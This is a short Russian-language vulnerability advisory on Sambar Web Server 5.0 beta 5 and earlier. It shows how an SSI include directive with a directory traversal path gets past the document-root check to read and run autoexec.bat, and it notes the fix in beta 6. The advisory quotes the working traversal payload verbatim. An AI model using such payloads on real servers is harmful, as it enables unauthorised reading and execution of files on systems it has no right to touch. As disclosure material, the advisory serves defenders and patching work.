Sambar сервер был создан для проверки трех инфраструктур связи, смоделированных после Sybase Open
Client/Open Server. Уязвимость защиты в программе позволяет нападавшим читать и выполнять пакетные файлы, которые
находятся вне корневого каталога. 

По умолчанию, все пользователи Sambar Web Server способны выполнить "*.bat" файлы в их домашних каталогах и использовать SSI.
Теперь если мы запишем: 

<!--#include file="c:\autoexec.bat"--> 

получим следующую информацию:

"SSI Error (path outside document directory) - error including file 

c:/autoexec.bat SSI processing failure."

Но если мы запишем что-то в таком виде:

<!--#include file="../../../../../../../../../../autoexec.bat"-->

появиться возможность увидеть и исполнить autoexec.bat.

Уязвимые системы:
Sambar 5.0 beta 5 и более ранние

Уязвимость устранена в Sambar version 5.0 beta 6

Оставить мнение